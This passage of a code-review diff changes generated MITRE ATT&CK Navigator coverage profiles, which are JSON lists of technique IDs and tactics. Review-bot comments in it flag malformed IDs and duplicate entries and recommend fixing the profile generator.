"", "enabled": 
true}, {"techniqueID": "T1211", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1140", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1105", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0189", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0007", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1124", "tactic": "discovery", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1070", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1036", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1170", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1170", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1196", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1196", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1500", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1036", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1219", "tactic": "command-and-control", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1088", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", 
"enabled": true}, {"techniqueID": "T1088", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1088", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1191", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1191", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1191", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0069", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0069", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0069", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1134", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1050", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1050", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1140", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1140", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1047", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0020", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0020", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1059", "tactic": "execution", "color": "#fcf26b", 
"comment": "", "enabled": true}, {"techniqueID": "T1059", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1085", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1085", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1055", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1055", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1087", "tactic": "discovery", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1084", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1070", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1070", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1067", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1067", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1134", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0010", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0010", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0010", "tactic": "exfiltration", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1098", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1098", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1098", "tactic": "exfiltration", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1002", "tactic": "lateral-movement", 
"color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1002", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1002", "tactic": "exfiltration", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1140", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1027", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1134", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1036", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1064", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1064", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1040", "tactic": "discovery", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0013", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1073", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1170", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1170", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1170", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1170", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1059", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1064", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1222", "tactic": 
"defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1076", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1076", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1482", "tactic": "discovery", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0001", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0001", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1059", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1059", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1085", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1085", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1036", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1193", "tactic": "initial-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1482", "tactic": "discovery", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1036", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1012", "tactic": "discovery", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1007", "tactic": "discovery", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1218", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1218", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1202", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": 
"execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1218", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1218", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1021", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1190", "tactic": "initial-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1064", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1064", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1085", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1085", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1015", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1015", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1191", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1191", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0069", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0069", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1210", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1089", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1055", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1055", "tactic": 
"privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1055", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1085", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1085", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0002", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0002", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1036", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1193", "tactic": "initial-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1103", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1036", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0005", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, 
{"techniqueID": "T1089", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1193", "tactic": "initial-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1183", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1183", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1183", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1043", "tactic": "command-and-control", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1055", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1105", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1050", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1037", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1037", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1084", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0005", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1060", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1193", "tactic": "initial-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1193", "tactic": "initial-access", "color": "#fcf26b", "comment": 
"", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1193", "tactic": "initial-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1117", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1117", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0002", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1073", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1064", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1064", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1027", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0139", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1023", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1088", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1088", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1006", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1055", "tactic": "execution", "color": "#fcf26b", 
"comment": "", "enabled": true}, {"techniqueID": "T1064", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1105", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1105", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1043", "tactic": "command-and-control", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1193", "tactic": "initial-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1084", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1060", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1084", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1085", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1085", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1073", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1073", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1038", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1038", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1112", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1112", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1055", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1055", "tactic": "privilege-escalation", "color": 
"#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1055", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1122", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0002", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1060", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1047", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1073", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1060", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1055", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1177", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1112", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1100", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1047", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1076", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1076", "tactic": "command-and-control", "color": 
"#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1193", "tactic": "initial-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1088", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1088", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1182", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1011", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1060", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1058", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1041", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1073", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1112", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1208", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1028", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1028", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0005", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0005", "tactic": 
"execution", "color": "#fcf26b", "comment": "", "enabled": true}], "gradient": {"colors": ["#ff6666", "#ffe766", "#8ec843"], "minValue": 0, "maxValue": 100}, "legendItems": [], "showTacticRowBackground": false, "tacticRowBackground": "#dddddd", "selectTechniquesAcrossTactics": true}
\ No newline at end of file
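Review bot: several `techniqueID` values in this generated profile are not well-formed ATT&CK enterprise IDs (`T0005`, `T0002`, `T0139` appear here; ATT&CK technique IDs have the form `T1xxx`), and the same `(techniqueID, tactic)` pair is emitted repeatedly (for example `T1003` / `credential-access` occurs more than a dozen times, `T1193` / `initial-access` several times). Both look like output of the profile generator rather than intentional content: the malformed IDs suggest a tag-to-technique mapping that drops or mangles a digit, and the repeats suggest the list is not deduplicated before serialisation. Suggest deduplicating on `(techniqueID, tactic)` in the generator and validating IDs against the ATT&CK pattern before writing the file, then regenerating; Navigator tolerates duplicates but the file size and diff noise grow with every added rule. Serialising with `indent` would also make future diffs of these files reviewable line by line instead of as one multi-kilobyte line.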
diff --git a/analytics/generated/attack_navigator_profiles/atc_attack_navigator_profile_CU_0001_TESTCUSTOMER.json b/analytics/generated/attack_navigator_profiles/atc_attack_navigator_profile_CU_0001_TESTCUSTOMER.json
index e5921a4..67c8a35 100644
--- a/analytics/generated/attack_navigator_profiles/atc_attack_navigator_profile_CU_0001_TESTCUSTOMER.json
+++ b/analytics/generated/attack_navigator_profiles/atc_attack_navigator_profile_CU_0001_TESTCUSTOMER.json
@@ -1 +1 @@
-{"version": "2.1", "domain": "mitre-enterprise", "description": "", "filters": {"stages": ["act"], "platforms": ["linux", "windows"]}, "sorting": 0, "viewMode": 0, "hideDisabled": true, "techniques": [{"techniqueID": "T1047", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1088", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1088", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1088", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1191", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1191", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1191", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0069", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0069", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0069", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1158", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1158", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1191", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1191", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0069", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": 
true}, {"techniqueID": "T0069", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1036", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1055", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1055", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1055", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1055", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}], "gradient": {"colors": ["#ff6666", "#ffe766", "#8ec843"], "minValue": 0, "maxValue": 100}, "legendItems": [], "showTacticRowBackground": false, "tacticRowBackground": "#dddddd", "selectTechniquesAcrossTactics": true, "name": "TESTCUSTOMER"}
\ No newline at end of file
+{"version": "2.1", "domain": "mitre-enterprise", "description": "", "filters": {"stages": ["act"], "platforms": ["linux", "windows"]}, "sorting": 0, "viewMode": 0, "hideDisabled": true, "techniques": [{"techniqueID": "T1047", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1088", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1088", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1088", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1191", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1191", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1191", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0069", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0069", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0069", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1191", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1191", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0069", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0069", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1036", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1055", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", 
"enabled": true}, {"techniqueID": "T1055", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1055", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1055", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}], "gradient": {"colors": ["#ff6666", "#ffe766", "#8ec843"], "minValue": 0, "maxValue": 100}, "legendItems": [], "showTacticRowBackground": false, "tacticRowBackground": "#dddddd", "selectTechniquesAcrossTactics": true, "name": "TESTCUSTOMER"}
\ No newline at end of file
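Review bot: the net change in this hunk is the removal of the `T1086` / `execution` entry and the two `T1158` entries (`defense-evasion`, `persistence`), but the issues from the other profile carry over unchanged: `T0069` is not a valid ATT&CK technique ID and appears five times, `T1191` / `defense-evasion`, `T1191` / `execution`, `T0069` / `defense-evasion`, `T0069` / `execution`, `T1055` / `defense-evasion` and `T1055` / `privilege-escalation` are each emitted twice, and `T1088` / `execution` and `T1191` / `execution` pair techniques with a tactic they are not listed under in ATT&CK. Since the profile is derived from the detection rules' `tags`, the cleanest fix is in the generator (validate and deduplicate) rather than in the generated JSON; if the removed entries were dropped because a customer-scoped rule was removed, the commit message should say so.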
diff --git a/data_needed/DN_0025_1102_the_audit_log_was_cleared.yml b/data_needed/DN_0025_1102_the_audit_log_was_cleared.yml
deleted file mode 100644
index 34d1a9e..0000000
